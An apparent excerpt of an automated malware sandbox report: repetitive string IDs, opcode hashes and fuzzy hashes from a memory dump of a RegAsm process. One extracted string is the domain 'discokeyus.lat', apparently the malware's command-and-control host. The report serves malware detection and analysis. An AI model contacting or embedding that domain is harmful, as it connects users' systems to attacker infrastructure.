                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Ef$TQ][$sWK)
                                                                                                        • API String ID: 0-3401374238
                                                                                                        • Opcode ID: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
                                                                                                        • Instruction ID: 19a0c778187f2748ae17dd07c5e08606c1358576a23e797e2c0b4f31c76305c1
                                                                                                        • Opcode Fuzzy Hash: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
                                                                                                        • Instruction Fuzzy Hash: CBB1C33061C3E08ED7398F2994507ABBBE09F97304F48499DD4D95B382DB79850ACBA7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: +|-~$/pqr$_
                                                                                                        • API String ID: 0-1379640984
                                                                                                        • Opcode ID: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
                                                                                                        • Instruction ID: 042a524babaaaf1240c13a88dd3a117b8cd22f0ed9ec4b151ea40a3d869026f8
                                                                                                        • Opcode Fuzzy Hash: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
                                                                                                        • Instruction Fuzzy Hash: D9810A5561495006DB2CDF3489A333BAAD79F84308B2991BFC995CFBABE93CC502874D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: "51s$9YB
                                                                                                        • API String ID: 0-2722061943
                                                                                                        • Opcode ID: 211a046e9116838b58fef2f862f3bc43e5d0a454b8724f73db8adee7e8caa559
                                                                                                        • Instruction ID: 779a5c1bb40158b59da43047085edf677e041d4ba635d65d9609cd33f89ab022
                                                                                                        • Opcode Fuzzy Hash: 211a046e9116838b58fef2f862f3bc43e5d0a454b8724f73db8adee7e8caa559
                                                                                                        • Instruction Fuzzy Hash: EE321976B00622CBCB24CF68D8516BFB3B2FF89310B99856DD442AB364DB395D41CB54
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Dx$discokeyus.lat
                                                                                                        • API String ID: 0-1480405892
                                                                                                        • Opcode ID: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                                                                                        • Instruction ID: 5bb1130f72a98c6f233d2c217a903bc57bb56de3339a3108bfc93ec34e4a158e
                                                                                                        • Opcode Fuzzy Hash: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                                                                                        • Instruction Fuzzy Hash: A1F1CDB054C3D18ED335CF6594907EBBBE0EB92314F144AAEC8D96B382C735090A8B97
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: R2B$6B
                                                                                                        • API String ID: 0-20043878
                                                                                                        • Opcode ID: ac58904699f18f78ac368c51fcd47e09c00d21abb36880cf37e6842ead4d4e32
                                                                                                        • Instruction ID: f5db2046e1d380e536cc29ae1ea4695f6a7d49829660d0c0f3bd76f15908f1aa
                                                                                                        • Opcode Fuzzy Hash: ac58904699f18f78ac368c51fcd47e09c00d21abb36880cf37e6842ead4d4e32
                                                                                                        • Instruction Fuzzy Hash: 3AD1C276A01116CFDB18CF68DC917AE73B2FB8A311F1A85A9D841E7390DB34AD11CB58
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: XG$|}
                                                                                                        • API String ID: 0-1014376750
                                                                                                        • Opcode ID: e601669f8485cc3344b93b58b39bec23c35c7299807bf4f05dda551d1a5ff6f0
                                                                                                        • Instruction ID: fef0f9a3622c059bd3dca30c9da84c32a684abbcbc54a65241ce9b590edefb0f
                                                                                                        • Opcode Fuzzy Hash: e601669f8485cc3344b93b58b39bec23c35c7299807bf4f05dda551d1a5ff6f0
                                                                                                        • Instruction Fuzzy Hash: ECD122B16083108BD724DF18D8927ABB7F2FFE5354F49891DE5868B3A1E7788801CB56
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: )$IEND
                                                                                                        • API String ID: 0-707183367
                                                                                                        • Opcode ID: 2936136e7c09e34564bd729017d030b62aa5c2817fbff3935057bfed89b429c8
                                                                                                        • Instruction ID: dbf6d47144c6b822b2acdb98883b9d528113f132bac91ec627b85730d464e823
                                                                                                        • Opcode Fuzzy Hash: 2936136e7c09e34564bd729017d030b62aa5c2817fbff3935057bfed89b429c8
                                                                                                        • Instruction Fuzzy Hash: 34D1CEB15083449FE720CF14D84575FBBE4AB94308F14492EFA99AB3C2E779D908CB96
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID: i$r}A
                                                                                                        • API String ID: 2994545307-2976846027
                                                                                                        • Opcode ID: 216b221475836e3855d1b8759aff26348fc53bb82e04dccbb46422255a771982
                                                                                                        • Instruction ID: bf893d2c0726f4e317e2b51d5e32a95bc91f637e65c50f94937d3483e244f6d9
                                                                                                        • Opcode Fuzzy Hash: 216b221475836e3855d1b8759aff26348fc53bb82e04dccbb46422255a771982
                                                                                                        • Instruction Fuzzy Hash: 4781A83694C351CFD710CF68D8806ABBBE2EBD2300F18496ED8D697252C7389985C7CA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: d$d
                                                                                                        • API String ID: 0-195624457
                                                                                                        • Opcode ID: 5ae760aa5af7d138e0a7bd51aa20738c42f63bbe965dfb313ec005962f2f09c8
                                                                                                        • Instruction ID: a6a5a8ac2d59b7de1a8b575b3a10bb681eff341670204cea3f60d1849e0cf04e
                                                                                                        • Opcode Fuzzy Hash: 5ae760aa5af7d138e0a7bd51aa20738c42f63bbe965dfb313ec005962f2f09c8
                                                                                                        • Instruction Fuzzy Hash: F1513A36908320CBC714CF24D85162BB7D2AB8A718F494A6DECC9A7351D7369D15CB8B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: P<?$P<?
                                                                                                        • API String ID: 0-3449142988
                                                                                                        • Opcode ID: 15a1e53f96b5dbffac6245dad95bb33219b4ef4f3549f5551b78542ea9aaefbe
                                                                                                        • Instruction ID: 58e7122ac3cea56caf2700395258951e32a9ff530ffc896d1714b79e34f88e6e
                                                                                                        • Opcode Fuzzy Hash: 15a1e53f96b5dbffac6245dad95bb33219b4ef4f3549f5551b78542ea9aaefbe
                                                                                                        • Instruction Fuzzy Hash: 64312976A44310EFD7208F54C880BBBB7A6F789300F58D92ED5C9A3251DB745C84879B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID: f
                                                                                                        • API String ID: 2994545307-1993550816
                                                                                                        • Opcode ID: 8e9e50587fb6b78e0fa4282dd31e32de0d85a4e7deb78124e5aaaf4c71ac60a2
                                                                                                        • Instruction ID: 18f220f42ed12d3f8706e230857eda4cfb4a422739cf4bd3cfbe98504a66e541
                                                                                                        • Opcode Fuzzy Hash: 8e9e50587fb6b78e0fa4282dd31e32de0d85a4e7deb78124e5aaaf4c71ac60a2
                                                                                                        • Instruction Fuzzy Hash: 8512D3706083418FD715CF28C88176FB7E5EB89314F289A2EE6E597392D734DC058B9A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: bC
                                                                                                        • API String ID: 0-3681614764
                                                                                                        • Opcode ID: 81246caaa5fb78c3d38635f3ad354d87a7ab4eb57a3eaf3217e543b2d80e8b50
                                                                                                        • Instruction ID: 871c5afb2dffc20ff0dbbcf53a0195aac73061a90b0e28cef4dba4d31fdaf636
                                                                                                        • Opcode Fuzzy Hash: 81246caaa5fb78c3d38635f3ad354d87a7ab4eb57a3eaf3217e543b2d80e8b50
                                                                                                        • Instruction Fuzzy Hash: 3712E23AA18215CFCB04CF28E8905AAB7B2FF8E311F1A847DD54697351D734A952CB88
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: bC
                                                                                                        • API String ID: 0-3681614764
                                                                                                        • Opcode ID: c70fff483ec8e9077dfc10fa089d78eeba6ca480428d69a1677b3b3847d620ad
                                                                                                        • Instruction ID: 5e30844967bebdc7bd1579877bde578fcf76ae60555b00215fe6639be0914efa
                                                                                                        • Opcode Fuzzy Hash: c70fff483ec8e9077dfc10fa089d78eeba6ca480428d69a1677b3b3847d620ad
                                                                                                        • Instruction Fuzzy Hash: 7DF1E436A28215CFCB04CF28E8905AAB7F2FF8E311F19847DD94697351D734A952CB88
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: bC
                                                                                                        • API String ID: 0-3681614764
                                                                                                        • Opcode ID: 1d8feeef0126ffe8c63342afaba4558ed33c57e7ba78c596c66c7e0fa34e77c1
                                                                                                        • Instruction ID: 5e6aaad999615e2ac42fefb03cf1b536ced96fd12a8bf48793a25e995ad5db17
                                                                                                        • Opcode Fuzzy Hash: 1d8feeef0126ffe8c63342afaba4558ed33c57e7ba78c596c66c7e0fa34e77c1
                                                                                                        • Instruction Fuzzy Hash: BAF1E536A28215CFCB04CF68E8905AAB7F2FF8E311F19847DD94697351D734A952CB88
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: bC
                                                                                                        • API String ID: 0-3681614764
                                                                                                        • Opcode ID: b154c6e34f79c6648591b9b450c448a67bbc93cb44fa5396b7d9856807c8a211
                                                                                                        • Instruction ID: a5988ab96186a7325d1362fbcccc642df08cbf2eaa279a3d6103cdc8c7b46e1e
                                                                                                        • Opcode Fuzzy Hash: b154c6e34f79c6648591b9b450c448a67bbc93cb44fa5396b7d9856807c8a211
                                                                                                        • Instruction Fuzzy Hash: B7F1F536A28215CFCB04CF68E8905AAB7F2FF8E311F19847DD94697351D734A952CB88
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: jk
                                                                                                        • API String ID: 0-78326018
                                                                                                        • Opcode ID: 25ef1f9adb694a81f93120e111aa8eff1c89ad6ac93ee7fa2faf286b71ff90ec
                                                                                                        • Instruction ID: 68e7885be5d05e4a2cf040f704cbb8fa7a41bea7ef2f0d8a510bf149587bd7f9
                                                                                                        • Opcode Fuzzy Hash: 25ef1f9adb694a81f93120e111aa8eff1c89ad6ac93ee7fa2faf286b71ff90ec
                                                                                                        • Instruction Fuzzy Hash: DDE1033A618356CBC7188F38DC5126B73E2FF4A351F0AC87DE9818B2A0E779C9558754
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: bC
                                                                                                        • API String ID: 0-3681614764
                                                                                                        • Opcode ID: 10f45940bf441a6cd71f6e58040424d3e031c37bab43412074f48cf734061f8b
                                                                                                        • Instruction ID: 2fa55bda5e41fd724e566356672d144f9f42af162050902131bcbf15531586af
                                                                                                        • Opcode Fuzzy Hash: 10f45940bf441a6cd71f6e58040424d3e031c37bab43412074f48cf734061f8b
                                                                                                        • Instruction Fuzzy Hash: E9E1C376A28215CFCB08CF28E8905AAB7F2FF8E310F19857DD94697351D734A952CB84
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: {}
                                                                                                        • API String ID: 0-4269290415
                                                                                                        • Opcode ID: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
                                                                                                        • Instruction ID: 0af4e1219fe889d167e9da05173529857e0f89c87775fbd0e3160429af4db955
                                                                                                        • Opcode Fuzzy Hash: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
                                                                                                        • Instruction Fuzzy Hash: 82E101B5608340DFE724DF24E88176FB7B2FB85304F54893DE5859B2A2DB789805CB4A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: "
                                                                                                        • API String ID: 0-123907689
                                                                                                        • Opcode ID: f5bf1b62e76307cdd5fc82252a9a1afcae73f4398661cde8b6da05f895bcd9dc
                                                                                                        • Instruction ID: ccf2f4e9833933b2009195e793b8faf6d5d6e2cba860aec0098ae2c38f35b308
                                                                                                        • Opcode Fuzzy Hash: f5bf1b62e76307cdd5fc82252a9a1afcae73f4398661cde8b6da05f895bcd9dc
                                                                                                        • Instruction Fuzzy Hash: FDD11F72B083255FC714CE25A89076BB7DAAF84350F89892EECA987381D738DD15C7C6
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID: /,-
                                                                                                        • API String ID: 2994545307-1700940157
                                                                                                        • Opcode ID: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
                                                                                                        • Instruction ID: 73ea5f1ed436ac76404857fefd2ddfa4c8367646346d3918638d2e9e73e3d7e7
                                                                                                        • Opcode Fuzzy Hash: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
                                                                                                        • Instruction Fuzzy Hash: 8EB18E717083014BD714DF25888163BF792EBCA314F14A92EF5D557392DB39EC068B9A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID: VtA
                                                                                                        • API String ID: 2994545307-3724035812
                                                                                                        • Opcode ID: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
                                                                                                        • Instruction ID: ed71193d6b2bdbbac52031f97d74cd30495a87e66650ae04c888d17f76a05038
                                                                                                        • Opcode Fuzzy Hash: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
                                                                                                        • Instruction Fuzzy Hash: 5DC139766083419FD714CF28D8817AFB7E2AB95310F09892EE4D5D7392C738D885C75A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: bC
                                                                                                        • API String ID: 0-3681614764
                                                                                                        • Opcode ID: 12f582ca5cb52f02cbb6c7a65b3a2962543ce7e68b8d395708436d5f2da692ba
                                                                                                        • Instruction ID: 4d20f92c875f40788edf4275f174b054e137e174bc84352c0492b1430194fbac
                                                                                                        • Opcode Fuzzy Hash: 12f582ca5cb52f02cbb6c7a65b3a2962543ce7e68b8d395708436d5f2da692ba
                                                                                                        • Instruction Fuzzy Hash: F3C1C176A28215CFCB08CF68E8905AAB7F2FF8E310F19897DD54597351C734A952CB84
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 9YB
                                                                                                        • API String ID: 0-659603884
                                                                                                        • Opcode ID: cc1449e27a0f5531b09e40fa76c2dd5bb8592e6f2d5bdd274fc9f48ccbd80c23
                                                                                                        • Instruction ID: 1cfe0ac6ad2819008f92b10fbbf01a1b5c50993105dc128c753fe97305f097ae
                                                                                                        • Opcode Fuzzy Hash: cc1449e27a0f5531b09e40fa76c2dd5bb8592e6f2d5bdd274fc9f48ccbd80c23
                                                                                                        • Instruction Fuzzy Hash: 80B1077AA00215CBDB18CFA9D8916BFB7B2FF89310F58816DD442AB355DB395C42CB84
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: .
                                                                                                        • API String ID: 0-248832578
                                                                                                        • Opcode ID: 2ac21a3dbd00c1a7cfa2cfa9c8571f5cf891ae991bce99d29bc9653d85f38a4a
                                                                                                        • Instruction ID: 2823e07fbbb50db066b2c442ced4ae8f01fbddd957871d70742adaa2677f6ced
                                                                                                        • Opcode Fuzzy Hash: 2ac21a3dbd00c1a7cfa2cfa9c8571f5cf891ae991bce99d29bc9653d85f38a4a
                                                                                                        • Instruction Fuzzy Hash: FE912A71E082524BC721CE29CA8025BB7E5AB81350F198A7ED8D5E73D1EA39DD414BC5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 0
                                                                                                        • API String ID: 0-4108050209
                                                                                                        • Opcode ID: 08d7d0d85d1217bd50795314ef511c4ead64b35a0bf6ca8811da1f806bdc1b7e
                                                                                                        • Instruction ID: 9f054d13e7867a4d77ca7132c07c00ca598ea50f9319f8eda39875565fe9693e
                                                                                                        • Opcode Fuzzy Hash: 08d7d0d85d1217bd50795314ef511c4ead64b35a0bf6ca8811da1f806bdc1b7e
                                                                                                        • Instruction Fuzzy Hash: AD914827759A8007D31C9E3D5C622A7BA834BEB330F2DD37EA5B1CB3E5D56888064359
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ,
                                                                                                        • API String ID: 0-3772416878
                                                                                                        • Opcode ID: 6b8a4f0fabbfe26aa1da2124c088442218b17e99f03b7e47905338ccd447f468
                                                                                                        • Instruction ID: 72525c85f477075dffe7e14f80d8e4d34094ebf61648e765f9981e94dfd3314a
                                                                                                        • Opcode Fuzzy Hash: 6b8a4f0fabbfe26aa1da2124c088442218b17e99f03b7e47905338ccd447f468
                                                                                                        • Instruction Fuzzy Hash: 88B137711087859FC321DF18C88061BFBE0AFA9704F444A2EF5D997782D675E918CB67
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: "
                                                                                                        • API String ID: 0-123907689
                                                                                                        • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                        • Instruction ID: 33b1f2780e14060464d7ed180fcf8b3e4403934f6fcecc96c03af05ff21b71f5
                                                                                                        • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                        • Instruction Fuzzy Hash: 4A71D732B083358BD714CE28E48432FB7E2EBC5750FA9856EE89497351D7389C4587CA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: klm
                                                                                                        • API String ID: 0-3800403225
                                                                                                        • Opcode ID: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
                                                                                                        • Instruction ID: fbab8d391cb70804594fb2969dbf4b57704b04da195ac2ac4d1ccbe35a174314
                                                                                                        • Opcode Fuzzy Hash: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
                                                                                                        • Instruction Fuzzy Hash: 9751F3B4A0D3508BD314EF25D81276BB7F2EFA6348F18856EE4D54B391E7398501CB1A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: pF
                                                                                                        • API String ID: 0-4112324664
                                                                                                        • Opcode ID: fe2049b3d9abf6bd8e08d2fec2b5cc8118d281e5b2e668e1a48ceb0649ab8eab
                                                                                                        • Instruction ID: 4b15e4364feff8b1cae5d4f97873799dd65533a9f2e3c3f3723fc524ea0f092f
                                                                                                        • Opcode Fuzzy Hash: fe2049b3d9abf6bd8e08d2fec2b5cc8118d281e5b2e668e1a48ceb0649ab8eab
                                                                                                        • Instruction Fuzzy Hash: 6651C572E442698BDB28CF68D8513DEB7B2FB84304F1581BEC55AEB384CB3449468F81
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID: ?^A
                                                                                                        • API String ID: 2994545307-4120214115
                                                                                                        • Opcode ID: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
                                                                                                        • Instruction ID: 9ee6d34e9011fc7addbd5ae762574014bc539ca284b22a695acd6cfcc742d02e
                                                                                                        • Opcode Fuzzy Hash: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
                                                                                                        • Instruction Fuzzy Hash: 2141783A648300DFE3248B94D880ABBBBA3B7D5310F5D552EC5C527222CB745C81878F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 6B
                                                                                                        • API String ID: 0-4127139157
                                                                                                        • Opcode ID: e4ae7821e595edd76aaa032931955796ee87cd6bb1a1de6a8bf0ae27a5d1bb00
                                                                                                        • Instruction ID: 96ac195b9b02395a12e3507be26d084a31814086cf7b4e33e8fc611c97ddc8d1
                                                                                                        • Opcode Fuzzy Hash: e4ae7821e595edd76aaa032931955796ee87cd6bb1a1de6a8bf0ae27a5d1bb00
                                                                                                        • Instruction Fuzzy Hash: 90416A79A05102CFE708CF68EC917A9B3B2FF8A311F5A45B8D545E7390CB74A951CB48
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1936623699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $%
                                                                                                        • API String ID: 0-4214564638
                                                                                                        • Opcode ID: d78bc3d5ce02b10deb2a392cf77ba543051be3d806e39ea4f7dd24e4e80accd5
